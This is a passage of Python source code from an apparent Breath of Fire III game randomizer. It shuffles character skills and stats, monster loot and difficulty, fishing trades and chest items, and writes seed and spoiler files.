self.old_data:\n value = getattr(self, attr)\n if value < 0:\n value = value + 0x100\n assert 0 <= value <= 0xff\n setattr(self, attr, value)\n\n\nclass BaseStatsObject(NameMixin):\n flag = 'c'\n flag_description = 'characters'\n custom_random_enable = 'c'\n RESTRICTED_NAMES = ['Teepo', 'Whelp']\n\n randomselect_attributes = [\n 'surprise_chance', 'reprisal_chance', 'critical_chance',\n 'evasion', 'accuracy']\n\n def __repr__(self):\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n s = '{0:0>2X} {1}\\n'.format(self.index, self.name)\n s += ' | '.join('{0:3}: {1:>2}'.format(\n stat.upper(), getattr(self, stat)) for stat in stats) + '\\n'\n for l in self.levels:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n s += ' - LV{0:0>2} {1} ({2})\\n'.format(l.level,\n skill.name, skill.cost)\n return s.strip()\n\n @property\n def intershuffle_valid(self):\n return self.name not in self.RESTRICTED_NAMES\n\n @property\n def all_abilities(self):\n return [AbilityObject.get(a) for a in\n self.healing_abilities + self.assist_abilities +\n self.attack_abilities + self.skills_abilities\n if AbilityObject.get(a).name]\n\n @cached_property\n def levels(self):\n return [l for l in LevelObject.every if l.index // 99 == self.index]\n\n @cached_property\n def delevel_stats(self):\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n stats_values = {}\n for stat in stats:\n assert self.old_data[stat] == self.old_data['base_%s' % stat]\n stats_values[stat] = self.old_data[stat]\n\n for i in range(self.level, 1, -1):\n level_data = self.levels[i-1]\n for stat in stats:\n stats_values[stat] -= level_data.get_old_stat(stat)\n return stats_values\n\n def relevel_stats(self, stats_values=None):\n if not self.levels:\n return stats_values\n if stats_values is None:\n stats_values = self.delevel_stats\n for i in range(self.level + 1):\n level_data = self.levels[i]\n for stat in sorted(stats_values):\n stats_values[stat] += getattr(level_data, stat)\n return stats_values\n\n def mutate_skills(self):\n if not self.levels:\n return\n\n base_characters = [bso for bso in BaseStatsObject.every\n if bso.intershuffle_valid]\n base = random.choice(base_characters)\n base_levels = [l for l in base.levels if l.old_data['ability'] > 0]\n new_skills = []\n elements1 = ['fire', 'ice', 'lightning', 'wind']\n elements2 = ['earth', 'holy']\n elements = elements1 + elements2\n random.shuffle(elements1)\n random.shuffle(elements2)\n shuffled_elements = elements1 + elements2\n skill_type_counts = defaultdict(int)\n SKILL_TYPE_MAX_COUNT = 10\n for l in base_levels:\n l.ability = 0\n for _ in range(1000):\n base_rank = AbilityObject.get(\n l.old_data['ability']).levelup_alt\n base_misc = AbilityObject.get(\n random.choice(base_levels).old_data['ability'])\n\n skill_type = base_misc.calculate_skill_type()\n skill_count = skill_type_counts[skill_type]\n if skill_count >= SKILL_TYPE_MAX_COUNT:\n assert skill_count == SKILL_TYPE_MAX_COUNT\n continue\n\n assert base_rank.index != 0 and base_misc.index != 0\n candidates = [\n c for c in AbilityObject.every\n if c.is_offense == base_misc.is_offense\n and c.is_utility == base_misc.is_utility\n and c is c.levelup_alt and c.rank >= 0\n and c.old_name not in AbilityObject.LEVELUP_BANNED_SKILLS]\n for e in shuffled_elements:\n if base_misc.get_bit(e):\n index = shuffled_elements.index(e)\n new_element = elements[index]\n candidates = [c for c in candidates\n if c.get_bit(new_element)]\n break\n if not candidates:\n continue\n\n new_skill = base_rank.get_similar(\n candidates=candidates, override_outsider=True,\n random_degree=AbilityObject.random_degree,\n allow_intershuffle_invalid=True)\n new_skill = new_skill.levelup_alt\n\n assert base_rank in candidates or new_skill is not base_rank\n if new_skill not in new_skills:\n if new_skill.skill_type & 3 != AbilityObject.EXAMINE_SKILL:\n skill_type = new_skill.skill_type & 3\n count = skill_type_counts[skill_type]\n if (count >= SKILL_TYPE_MAX_COUNT):\n continue\n else:\n new_skill.reset_skill_type()\n if new_skill.get_bit('examinable'):\n new_skill.set_bit('examinable', False)\n new_skills.append(new_skill)\n skill_type_counts[skill_type] += 1\n break\n\n base_levels = base_levels[:len(new_skills)]\n assert len(new_skills) == len(base_levels)\n base_level_levels = [l.level for l in base_levels]\n lower, upper = min(base_level_levels), max(base_level_levels)\n final_levels = []\n for l in base_level_levels:\n while True:\n l = mutate_normal(l, minimum=lower, maximum=upper,\n random_degree=AbilityObject.random_degree)\n if l not in final_levels:\n final_levels.append(l)\n break\n final_levels = sorted(set(final_levels))\n assert len(final_levels) == len(new_skills)\n level_skills = dict(zip(final_levels, new_skills))\n\n for l in self.levels:\n if l.level in level_skills:\n l.ability = level_skills[l.level].index\n else:\n l.ability = 0\n\n def randomize_resistances(self):\n elemental_resistances = []\n status_resistances = []\n for bso in BaseStatsObject.every:\n if not bso.intershuffle_valid:\n continue\n elemental_resistances += bso.resistances[:5]\n status_resistances += bso.resistances[-3:]\n resistances = (\n [random.choice(elemental_resistances) for _ in range(5)] +\n [5] + [random.choice(status_resistances) for _ in range(3)])\n resistances = [mutate_normal(r, 0, 7, random_degree=self.random_degree)\n for r in resistances]\n self.resistances = resistances\n assert len(self.resistances) == len(self.old_data['resistances'])\n\n def mutate_stats(self):\n bases = [bso for bso in BaseStatsObject.every\n if bso.name not in bso.RESTRICTED_NAMES]\n stats = sorted(self.delevel_stats.keys())\n chosen_bases = {}\n initial_stats = {}\n for s in stats:\n chosen_bases[s] = random.choice(bases)\n for (i, old_l) in enumerate(self.levels):\n if i == 0:\n continue\n i = mutate_normal(i, 1, 98, random_degree=self.random_degree)\n new_l = chosen_bases[s].levels[i]\n new_value = new_l.get_old_stat(s)\n old_l.set_stat(s, new_value)\n initial_stats[s] = chosen_bases[s].delevel_stats[s]\n\n new_stats = self.relevel_stats(initial_stats)\n for attr, value in sorted(new_stats.items()):\n assert hasattr(self, attr)\n setattr(self, attr, value)\n\n def mutate(self):\n super().mutate()\n self.mutate_stats()\n self.randomize_resistances()\n self.reseed('skills')\n if AbilityObject.flag in get_flags():\n self.mutate_skills()\n\n def cleanup(self):\n weapon = WeaponObject.get(self.weapon)\n if not weapon.get_bit(self.name.lower()) and weapon.name != 'Nothing':\n candidates = [w for w in WeaponObject.ranked if\n w.get_bit(self.name.lower())]\n temp = [c for c in candidates\n if bin(c.equipability & 0xF7).count('1') == 1]\n if temp:\n candidates = temp\n self.weapon = candidates[0].index\n\n for attr in ['shield', 'helmet', 'armor']:\n armor = ArmorObject.get(getattr(self, attr))\n if not armor.get_bit(self.name.lower()):\n setattr(self, attr, 0)\n\n accessories = [AccessoryObject.get(a) for a in self.accessories]\n accessories = [a for a in accessories if a.get_bit(self.name.lower())]\n accessories = [a.index for a in accessories]\n while len(accessories) < 2:\n accessories.append(0)\n\n ability_check = (self.flag in get_flags() and\n AbilityObject.flag in get_flags())\n if ability_check:\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n setattr(self, '%s_abilities' % ability_type, list([]))\n\n for l in self.levels:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n skill_type = skill.skill_type & 3\n if self.name not in self.RESTRICTED_NAMES:\n try:\n assert not skill.get_bit('examinable')\n assert skill_type != AbilityObject.EXAMINE_SKILL\n except AssertionError:\n if MasterSkillsObject.flag not in get_flags():\n if not hasattr(BaseStatsObject, '_warn_msg'):\n print('Warning: Without random masters, '\n 'skill conflict cannot be resolved.')\n BaseStatsObject._warn_msg = True\n else:\n raise Exception('Skill conflict.')\n\n if l.level <= self.level:\n if skill_type == AbilityObject.HEALING_SKILL:\n self.healing_abilities.append(skill.index)\n elif skill_type == AbilityObject.ASSIST_SKILL:\n self.assist_abilities.append(skill.index)\n elif skill_type == AbilityObject.ATTACK_SKILL:\n self.attack_abilities.append(skill.index)\n elif skill_type == AbilityObject.EXAMINE_SKILL:\n self.skills_abilities.append(skill.index)\n\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n attr = '%s_abilities' % ability_type\n values = getattr(self, attr)\n assert all(a for a in values)\n assert len(set(values)) == len(values)\n while len(getattr(self, attr)) < len(self.old_data[attr]):\n getattr(self, attr).append(0)\n assert len(getattr(self, attr)) == len(self.old_data[attr])\n else:\n for ability_type in ['healing', 'assist', 'attack', 'skills']:\n attr = '%s_abilities' % ability_type\n assert getattr(self, attr) == self.old_data[attr]\n\n\n for attr in sorted(self.old_data):\n if (attr in ['weapon', 'shield', 'helmet', 'armor', 'accessories']\n and EquipmentObject.flag in get_flags()):\n continue\n if self.flag not in get_flags():\n assert getattr(self, attr) == self.old_data[attr]\n other_attrs = ['base_%s' % attr, 'current_%s' % attr]\n for other in other_attrs:\n if other in self.old_data:\n setattr(self, other, getattr(self, attr))\n\n if self.name == 'Whelp':\n self.attack_abilities = self.old_data['attack_abilities']\n\n if self.name == 'Ryu':\n for l in LevelObject.every:\n if l.ability > 0:\n skill = AbilityObject.get(l.ability)\n if skill.old_name in ['Pilfer', 'Steal']:\n break\n else:\n pilfer = [a for a in AbilityObject.every\n if a is a.examine_alt and a.old_name == 'Pilfer'][0]\n pilfer.set_bit('examinable', True)\n pilfer.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n self.skills_abilities.remove(0)\n self.skills_abilities.insert(0, pilfer.index)\n assert (len(self.skills_abilities) ==\n len(self.old_data['skills_abilities']))\n\n if 'easymodo' in get_activated_codes() or self.name == 'Whelp':\n self.accuracy = 100\n self.base_accuracy = 100\n self.current_hp = 999\n self.max_hp = 999\n self.base_max_hp = 999\n\n\nclass BaseStats2Object(TableObject):\n @classproperty\n def after_order(self):\n return [BaseStatsObject]\n\n def cleanup(self):\n for attr in self.old_data:\n assert (self.old_data[attr] ==\n BaseStatsObject.get(self.index).old_data[attr])\n setattr(self, attr, getattr(BaseStatsObject.get(self.index), attr))\n\n\nclass ManilloStockObject(TableObject):\n def __repr__(self):\n s = 'TRADER {0:0>2X} ({1})\\n'.format(self.index, self.name.upper())\n for t in self.trades:\n s += ' %s\\n' % t\n return s.strip()\n\n @property\n def name(self):\n return {\n 0: 'Farm',\n 2: 'Tower',\n 7: 'Urkan Tapa',\n 9: 'Dauna Mine',\n 0xb: 'Cliff',\n 0xd: 'Steel Beach',\n 0xf: 'Kombinat',\n }[self.index]\n\n @property\n def trades(self):\n return [ManilloItemObject.get(i)\n for i in self.trade_indexes if i != 0xFF]\n\n\nclass ChestObject(DupeMixin, AcquireItemMixin):\n flag_description = 'treasure'\n\n def __repr__(self):\n if self.item:\n s = 'CHEST {0:0>2X} ({1:0>3}-{2:0>2x}): {3}'.format(\n self.index, self.area_code, self.memory, self.item.name)\n else:\n assert self.item_type == 0xFF\n zenny = '{0}Z'.format(self.value)\n s = 'CHEST {0:0>2X} ({1:0>3}-{2:0>2x}): {3}'.format(\n self.index, self.area_code, self.memory, zenny)\n return s\n\n @property\n def value(self):\n if self.item:\n return self.item.old_data['price']\n assert self.item_type == 0xFF\n return self.item_index * 40\n\n @property\n def area_code(self):\n filename = self.filename[-11:]\n assert filename.startswith('AREA') and filename.endswith('.EMI')\n return int(filename[-7:-4])\n\n @property\n def area_name(self):\n if hasattr(self, '_area_name'):\n return self._area_name\n\n area_names = {}\n with open(path.join(tblpath, 'names_areas.txt')) as f:\n for line in f:\n index, description = line.strip().split(' ', 1)\n index = int(index)\n if '(' in description:\n area, location = description.split('(', 1)\n location = '(' + location\n else:\n area = description\n location = ''\n area = area.upper()\n location = location.lower()\n area_names[index] = '{0} {1}'.format(area, location).strip()\n\n for c in ChestObject.every:\n c._area_name = area_names[c.area_code]\n\n return self.area_name\n\n def cleanup(self):\n super().cleanup()\n\n if 'thinkwell' in get_activated_codes() and self.memory == 2:\n self.item_type, self.item_index = 4, 0xf\n\n\nclass GeneObject(TableObject):\n flag = 'g'\n flag_description = 'dragon gene locations'\n intershuffle_attributes = ['gene_index']\n\n def cleanup(self):\n if self.gene_index == 0x21:\n assert 'patch_flame_gene.txt' in get_activated_patches()\n self.gene_index = 0\n assert 0 <= self.gene_index <= 0x11\n\n\nclass ChrysmObject(TableObject):\n @classproperty\n def after_order(self):\n return [GeneObject]\n\n @property\n def gene(self):\n genes = [g for g in GeneObject.every if g.filename == self.filename]\n assert len(genes) == 1\n gene = genes[0]\n assert gene.old_data['gene_index'] == self.old_data['gene_index']\n return gene\n\n def cleanup(self):\n self.gene_index = self.gene.gene_index\n\n\nclass FormationObject(TableObject):\n def __repr__(self):\n s = 'FORMATION {0:0>3X} ({1}): '.format(\n self.index, self.appearance_rate)\n counts = dict(Counter(self.enemies))\n if None in counts:\n del(counts[None])\n if not counts:\n s += 'Nothing'\n return s.strip()\n monster_counts = sorted(counts.items(),\n key=lambda item: (counts[item[0]], item[0].name))\n s += ', '.join(['{0} x{1} '.format(monster.name, count)\n for monster, count in monster_counts])\n return s.strip()\n\n @cached_property\n def available_enemies(self):\n return [e for e in MonsterObject.every if e.filename == self.filename]\n\n @property\n def enemies(self):\n return [self.available_enemies[eid] if eid < 0xff else None\n for eid in self.monster_indexes]\n\n def cleanup(self):\n if 'easymodo' in get_activated_codes():\n self.appearance_rate = 0\n if self.old_data['appearance_rate'] != 0:\n self.monster_indexes = [0xff]*8\n\n\nclass ManilloItemObject(DupeMixin, AcquireItemMixin):\n flag = 's'\n custom_random_enable = 's'\n\n def __repr__(self):\n fishdesc = ', '.join(\n '{0} x{1}'.format(fish.name, n) for (fish, n) in self.fishes)\n s = '{1} ({2})'.format(self.index, self.item.name, fishdesc)\n return s.strip()\n\n @property\n def fishes(self):\n fishes = []\n for i, n in zip(self.fish_indexes, self.fish_quantities):\n if i == 0xFF or n == 0:\n continue\n fish = ItemObject.get(0x38 + i)\n fishes.append((fish, n))\n return fishes\n\n def mutate(self):\n if not self.is_canonical:\n return\n\n super().mutate(unique=True)\n if self.random_degree == 0:\n return\n\n old_fish_value = 0\n for (fish, n) in self.fishes:\n old_fish_value += (fish.old_data['price'] * n)\n\n values = [self.old_item.old_data['price'],\n self.old_item.price,\n self.item.old_data['price'],\n self.item.price]\n\n old_item_value = self.old_item.old_data['price']\n target_value = random.randint(min(values), max(values))\n target_fish_value = target_value * old_fish_value / old_item_value\n new_fishes = [(None, 0), (None, 0), (None, 0)]\n candidate_fishes = sorted(\n [ItemObject.get(i) for i in range(0x38, 0x4d)],\n key=lambda i: i.old_data['price'])\n target_fish_value = max(\n target_fish_value, min([f.old_data['price']\n for f in candidate_fishes]))\n candidate_fishes = [c for c in candidate_fishes\n if c.old_data['price'] <= target_fish_value * 2]\n max_index = len(candidate_fishes)-1\n stagnation_counter = 0\n MAX_STAGNATION = 20\n while True:\n index = int(round(\n (random.random() ** (1/self.random_degree)) * max_index))\n replacement_fish = candidate_fishes[index]\n for (fish, n) in new_fishes:\n if fish == replacement_fish:\n replace_fish = fish\n replace_quantity = n\n replacement_quantity = n + 1\n break\n else:\n replace_fish, replace_quantity = random.choice(new_fishes)\n if replace_fish is not None:\n replace_value = (replace_fish.old_data['price']\n * replace_quantity)\n replacement_quantity = ceil(\n replace_value / replacement_fish.old_data['price'])\n else:\n replacement_quantity = random.randint(\n 1, random.randint(1, 9))\n\n if 1 <= replacement_quantity <= 9:\n stagnation_counter = 0\n new_fishes.remove((replace_fish, replace_quantity))\n new_fishes.append((replacement_fish, replacement_quantity))\n else:\n stagnation_counter += 1\n if stagnation_counter >= MAX_STAGNATION:\n break\n continue\n\n current_value = 0\n for (fish, n) in new_fishes:\n if fish is None:\n continue\n current_value += (fish.old_data['price'] * n)\n if current_value >= target_fish_value:\n break\n\n new_fishes = sorted(\n new_fishes, key=lambda f: (99999 if f[0] is None else f[0].index))\n self.fish_indexes = [fish.index-0x38 if fish else 0xFF\n for fish, n in new_fishes]\n self.fish_quantities = [n if fish else 0 for fish, n in new_fishes]\n\n\nclass MonsterObject(DupeMixin, NameMixin):\n flag = 'e'\n flag_description = 'enemies'\n custom_random_enable = 'e'\n custom_difficulty_enable = False\n difficulty_attrs = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n randomselect_attributes = [\n 'hp', 'ap', 'pwr', 'dfn', 'agi', 'int',\n ('steal_item_type', 'steal_item_index', 'steal_rate'),\n ('drop_item_type', 'drop_item_index', 'drop_rate'),\n 'resistances']\n\n mutate_attributes = {\n 'hp': (1, 65000),\n 'ap': None,\n 'pwr': None,\n 'dfn': None,\n 'agi': None,\n 'int': None,\n 'steal_rate': None,\n 'drop_rate': None,\n }\n\n RESISTANCES_NAMES = ['Fire', 'Frost', 'Thunder', 'Earth', 'Wind',\n 'Holy', 'Psionic', 'Status', 'Death']\n\n def __repr__(self):\n s = '{0:0>3X} LV{1:>3} {2}{3}\\n'.format(\n self.index, self.level, self.name,\n '' if self.is_canonical else '*')\n stats = ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']\n s += ' - '.join('{0}:{1}'.format(\n stat.upper(), getattr(self, stat)) for stat in stats) + '\\n'\n for i in range(3):\n resistances_names = self.RESISTANCES_NAMES[(i*3):(i*3)+3]\n resistances = self.resistances[(i*3):(i*3)+3]\n s += ' | '.join('{0:7} {1}'.format(\n a, b) for (a, b) in zip(resistances_names, resistances)) + '\\n'\n steal_rate = (2**self.steal_rate) / 128 if self.steal_rate else 0\n steal_rate = int(round(steal_rate*100))\n s += 'Steal: {0} {1}%\\n'.format(\n self.steal_item.name if self.steal_item else None, steal_rate)\n drop_rate = (2**self.drop_rate) / 128 if self.drop_rate else 0\n drop_rate = int(round(drop_rate*100))\n s += 'Drop: {0} {1}%\\n'.format(\n self.drop_item.name if self.drop_item else None, drop_rate)\n skills = []\n for a in sorted(self.abilities, key=lambda x: x.name):\n if a.old_name in ['Nothing', 'Noting'] or not a.old_name:\n continue\n skills.append('{0}{1}'.format(\n a.name, '*' if a.get_bit('examinable') else ''))\n s += ', '.join(skills) + '\\n'\n return s.strip()\n\n @property\n def abilities(self):\n abilities = set(self.initial_skills)\n for i in range(1, 5):\n condition = getattr(self, 'condition%s' % i)\n if condition >= 99:\n assert condition == 99\n continue\n abilities |= set(getattr(self, 'skills%s' % i))\n abilities = [AbilityObject.get(a) for a in sorted(abilities)]\n return abilities\n\n @property\n def is_boss(self):\n if hasattr(self, '_is_boss'):\n return self._is_boss\n\n if not self.is_canonical:\n return self.canonical_relative.is_boss\n\n for m in MonsterObject.every:\n m._is_boss = True\n\n for f in FormationObject.every:\n if f.appearance_rate == 0:\n continue\n for m in f.enemies:\n if m is not None:\n m._is_boss = False\n\n return self.is_boss\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n if not self.name:\n return -1\n\n if not self.is_canonical:\n return self.canonical_relative.rank\n\n canons = [m for m in MonsterObject.every if m.is_canonical and m.name]\n canons = sorted(canons, key=lambda m: (m.signature, m.index))\n\n by_hp = sorted(canons, key=lambda m: m.old_data['hp'])\n by_level = sorted(canons, key=lambda m: m.old_data['level'])\n by_exp = sorted(canons, key=lambda m: m.old_data['exp'])\n max_index = len(canons)-1\n\n for n, m in enumerate(by_hp):\n m._hp_rank = n / max_index\n\n for n, m in enumerate(by_level):\n m._level_rank = n / max_index\n\n for n, m in enumerate(by_exp):\n m._exp_rank = n / max_index\n\n for m in canons:\n ranks = []\n if 1 <= m.old_data['hp'] <= 0xFFFE:\n ranks.append(m._hp_rank)\n if 1 <= m.old_data['level']:\n ranks.append(m._level_rank)\n\n if 1 <= m.old_data['exp']:\n ranks.append(m._exp_rank)\n elif 1 <= m.old_data['hp'] <= 0xFFFE:\n ranks.append(max(m._hp_rank, m._level_rank))\n\n m._rank = sum(ranks) / len(ranks)\n\n return self.rank\n\n @property\n def intershuffle_valid(self):\n return self.name and self.is_canonical and not self.is_boss\n\n def mutate_resistances(self):\n elemental_resistances = self.resistances[:5]\n status_resistances = self.resistances[-3:]\n random.shuffle(elemental_resistances)\n random.shuffle(status_resistances)\n self.resistances[:5] = elemental_resistances\n self.resistances[-3:] = status_resistances\n self.resistances = [\n mutate_normal(r, 0, 7, random_degree=self.random_degree)\n for r in self.resistances]\n\n @property\n def steal_item(self):\n if self.steal_rate == 0:\n return None\n item = ChestObject.get_item_by_type_index(self.steal_item_type,\n self.steal_item_index)\n return item\n\n @property\n def drop_item(self):\n if self.drop_rate == 0:\n return None\n item = ChestObject.get_item_by_type_index(self.drop_item_type,\n self.drop_item_index)\n return item\n\n def mutate_loot(self):\n item = self.steal_item\n if item is not None:\n item = item.get_similar(random_degree=ChestObject.random_degree)\n self.steal_item_type = ItemMixin.item_type_from_item(item)\n self.steal_item_index = item.index\n\n item = self.drop_item\n if item is not None:\n item = item.get_similar(random_degree=ChestObject.random_degree)\n self.drop_item_type = ItemMixin.item_type_from_item(item)\n self.drop_item_index = item.index\n\n def mutate_skills(self):\n if not self.intershuffle_valid:\n return\n\n ai_swap = self.get_similar(\n random_degree=MonsterAbilityObject.random_degree)\n self.initial_skills = list(getattr(ai_swap, 'initial_skills'))\n for i in range(1, 5):\n for attr in ['condition', 'ai_unknown', 'skills']:\n attr = '%s%s' % (attr, i)\n setattr(self, attr, ai_swap.old_data[attr])\n\n existing_skills = set([])\n for attr in ['initial_skills',\n 'skills1', 'skills2', 'skills3', 'skills4']:\n skills = [AbilityObject.get(s) for s in getattr(self, attr)]\n existing_skills |= set(skills)\n\n existing_skills = sorted(existing_skills, key=lambda s: s.index)\n skill_map = {}\n for existing in existing_skills:\n if existing.rank < 0:\n skill_map[existing.index] = existing.index\n continue\n\n candidates = [s for s in AbilityObject.ranked if s is s.examine_alt\n and existing.is_offense == s.is_offense\n and existing.is_utility == s.is_utility\n and s.rank >= 0]\n new_skill = existing.examine_alt.get_similar(\n candidates, random_degree=MonsterAbilityObject.random_degree)\n skill_map[existing.index] = new_skill.index\n\n for attr in ['initial_skills',\n 'skills1', 'skills2', 'skills3', 'skills4']:\n skills = [skill_map[s] for s in getattr(self, attr)]\n setattr(self, attr, skills)\n\n def mutate(self):\n if self.is_canonical:\n super().mutate()\n self.mutate_resistances()\n self.mutate_loot()\n self.reseed('skills')\n\n def difficulty_boost(self):\n if self.random_difficulty == 1.0:\n return\n\n monsters = [m for m in MonsterObject.ranked\n if m.is_canonical and m.rank >= 0]\n if self not in monsters:\n return\n\n if self.random_difficulty > 1.0:\n difficulty = self.random_difficulty - 1\n index = monsters.index(self)\n ranked_ratio = index / (len(monsters)-1)\n difficulty = (difficulty * ranked_ratio) + 1\n else:\n difficulty = self.random_difficulty\n\n for diffattr in self.difficulty_attrs:\n value = getattr(self, diffattr)\n value = int(round(value * random.uniform(1.0, difficulty)))\n if diffattr == 'hp':\n value2 = int(round(value * random.uniform(1.0, difficulty)))\n value = max(value, value2)\n\n length = [l for (attr, l, _) in self.specsattrs\n if attr == diffattr][0]\n assert 1 <= length <= 2\n if length == 1:\n value = min(value, max(0xFE, self.old_data[diffattr]))\n elif length == 2:\n value = min(value, max(0xFFFE, self.old_data[diffattr]))\n\n setattr(self, diffattr, value)\n\n new_resistances = []\n for r in self.resistances:\n assert 0 <= r <= 7\n r = int(round(r * random.uniform(1.0, difficulty)))\n r = max(0, min(r, 7))\n new_resistances.append(r)\n self.resistances = new_resistances\n\n def preclean(self):\n self.reseed('difficulty')\n self.difficulty_boost()\n\n if self.is_boss and self.random_difficulty >= 1.0:\n for attr in self.difficulty_attrs:\n value = getattr(self, attr)\n value = max(value, self.old_data[attr])\n setattr(self, attr, value)\n\n if self.name in ['Gary', 'Mogu']:\n for attr in self.difficulty_attrs:\n setattr(self, attr, self.old_data[attr])\n\n def cleanup(self):\n if ChestObject.flag not in get_flags():\n for attr in ['steal_item_index', 'steal_item_type', 'steal_rate',\n 'drop_item_index', 'drop_item_type', 'drop_rate']:\n setattr(self, attr, self.old_data[attr])\n\n super().cleanup()\n\n if 'easymodo' in get_activated_codes():\n self.hp = min(self.old_data['hp'], 1)\n\n\ndef write_seed_number():\n seed1 = 'Seed: {0}'.format(get_seed())\n while len(seed1) < addresses.seed1len:\n seed1 += ' '\n assert len(seed1) == addresses.seed1len\n seed2 = '{0}'.format(get_seed())\n while len(seed2) < addresses.seed2len:\n seed2 += ' '\n assert len(seed2) == addresses.seed2len\n seed1 = seed1.encode('ascii').replace(b' ', b'\\xff')\n seed1 = seed1.replace(b':', b'\\x8f')\n seed2 = seed2.encode('ascii').replace(b' ', b'\\xff')\n\n a = get_open_file('BIN/ETC/AFLDKWA.EMI', sandbox=True)\n b = get_open_file('BIN/ETC/FIRST.EMI', sandbox=True)\n a.seek(addresses.seed1a)\n a.write(seed1)\n a.seek(addresses.seed2a)\n a.write(seed2)\n b.seek(addresses.seed1b)\n b.write(seed1)\n b.seek(addresses.seed2b)\n b.write(seed2)\n\n\ndef activate_blue_magician_code():\n abilities = set([])\n for m in MonsterObject.every:\n if m.is_canonical:\n abilities |= set(m.abilities)\n\n for l in LevelObject.every:\n if (l.charname not in BaseStatsObject.RESTRICTED_NAMES\n and l.ability > 0):\n a = AbilityObject.get(l.ability)\n abilities -= {a}\n\n for a in sorted(abilities):\n a.set_bit('examinable', True)\n a.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n\n\ndef activate_feyday(filename):\n f = open(filename)\n\n names = sorted({line.strip() for line in f.readlines() if line.strip()})\n if any(len(name) > 5 for name in names):\n print('Warning: Name longer than 5 characters.')\n\n FairyObject.class_reseed('names')\n random.shuffle(names)\n faeries = [fo for fo in FairyObject.every if fo.is_canonical]\n random.shuffle(faeries)\n for name, faerie in zip(names, faeries):\n faerie.set_name(name)\n\n f.close()\n\n\ndef activate_abilonym(filename):\n with open(filename) as f:\n for line in f:\n if '#' in line:\n line, _ = line.split('#', 1)\n line = line.strip()\n if not line:\n continue\n\n if ' ' not in line:\n index, name = line, ''\n else:\n index, name = line.split(' ', 1)\n index, name = index.strip(), name.strip()\n index = int(index, 0x10)\n a = AbilityObject.get(index)\n a._rename = name\n\n\ndef write_spoiler(all_objects):\n SPOILER_FILENAME = 'bof3r_spoiler_{0}.txt'.format(get_seed())\n f = open(SPOILER_FILENAME, 'w+')\n\n f.write('{0} v{1} {2} {3} {4} {5}\\n'.format(\n get_global_label(), VERSION, get_flags(), get_seed(),\n get_random_degree()**0.5, get_difficulty()))\n\n all_objects = sorted(all_objects, key=lambda x: x.__name__)\n random_degrees = [(o.random_degree**0.5) for o in all_objects]\n if len(set(random_degrees)) > 1:\n f.write('R:{0}\\n'.format(' '.join('%s' % rd for rd in random_degrees)))\n random_diffs = [o.random_difficulty for o in all_objects]\n if len(set(random_diffs)) > 1:\n f.write('D:{0}\\n'.format(' '.join('%s' % rd for rd in random_diffs)))\n\n f.write('\\n1. MASTERS\\n'\n '2. CHARACTERS\\n'\n '3. MONSTERS\\n'\n '4. SHOPS\\n'\n '5. MANILLOS\\n'\n '6. CHESTS\\n\\n')\n\n f.write('1. MASTERS\\n\\n')\n for mso in MasterStatsObject.every:\n f.write(str(mso) + '\\n\\n')\n\n f.write('2. CHARACTERS\\n\\n')\n for bso in BaseStatsObject.every:\n f.write(str(bso) + '\\n\\n')\n\n f.write('3. MONSTERS\\n\\n')\n for m in sorted(MonsterObject.every, key=lambda x: x.name):\n if m.is_canonical:\n f.write(str(m) + '\\n\\n')\n\n f.write('4. SHOPS\\n\\n')\n for s in ShopObject.every:\n f.write(str(s) + '\\n\\n')\n\n f.write('5. MANILLOS\\n\\n')\n for mso in ManilloStockObject.every:\n if mso.trades:\n f.write(str(mso) + '\\n\\n')\n\n f.write('6. CHESTS\\n\\n')\n areas = {c.area_code for c in ChestObject.every}\n for a in sorted(areas):\n chests = [c for c in ChestObject.every if c.area_code == a]\n if not chests:\n continue\n area_name = chests[0].area_name\n f.write('AREA {0} {1}\\n'.format(a, area_name))\n for c in chests:\n f.write(str(c) + '\\n')\n f.write('\\n')\n\n f.close()\n\n\ndef write_cue_file():\n filename = get_outfile()\n cue_filename = '.'.join(filename.split('.')[:-1] + ['cue'])\n f = open(cue_filename, 'w+')\n f.write('FILE \"{0}\" BINARY\\n\\n'\n 'TRACK 01 MODE2/2352\\n\\n'\n 'INDEX 01 00:00:00\\n'.format(filename))\n f.close()\n\n\ndef rewrite_master_list():\n if MasterStatsObject.flag not in get_flags():\n return\n\n f = get_open_file('BIN/ETC/AFLDKWA.EMI', sandbox=True)\n f.seek(addresses.master_list_afldkwa)\n messages = []\n message = b''\n while len(messages) < 17:\n peek = f.read(1)\n if peek == b'\\x00':\n messages.append(message)\n message = b''\n else:\n message += peek\n\n def format_entry(mso, entry, short=False):\n if entry is None:\n return '{0:3}{1:2}'.format('', '')\n\n sign, attr = entry\n value = abs(getattr(mso, attr))\n if attr == 'dfn':\n attr = 'Def'\n elif attr in ['hp', 'ap']:\n attr = attr.upper()\n else:\n attr = attr[0].upper() + attr[1:]\n\n attr = attr[:2]\n if short:\n if sign == '+':\n return '$BLUE${0:2}{2}'.format(attr, sign, value)\n elif sign == '-':\n return '$RED${0:2}{2}'.format(attr, sign, value)\n else:\n if sign == '+':\n return '$BLUE${0:3}{1}{2}'.format(attr, sign, value)\n elif sign == '-':\n return '$RED${0:3}{1}{2}'.format(attr, sign, value)\n\n new_messages = []\n for mso in MasterStatsObject.every:\n plus = [('+', attr) for (attr, _, _) in mso.specsattrs\n if getattr(mso, attr) > 0]\n minus = [('-', attr) for (attr, _, _) in mso.specsattrs\n if getattr(mso, attr) < 0]\n plus, extra_plus = plus[:4], plus[4:]\n minus, extra_minus = minus[:4], minus[4:]\n plus += [None] * (4-len(plus))\n minus += [None] * (4-len(minus))\n if extra_plus:\n minus[-len(extra_plus):] = extra_plus\n if extra_minus:\n plus[-len(extra_minus):] = extra_minus\n assert len(plus) == len(minus) == 4\n new_message = ''\n short_message = ''\n for left, right in zip(plus, minus):\n if not (left or right):\n continue\n\n leftstr = format_entry(mso, left)\n rightstr = format_entry(mso, right)\n line = '{0} {1}'.format(leftstr, rightstr)\n line = line.rstrip() + '\\n'\n new_message += line\n\n leftstr = format_entry(mso, left, short=True)\n rightstr = 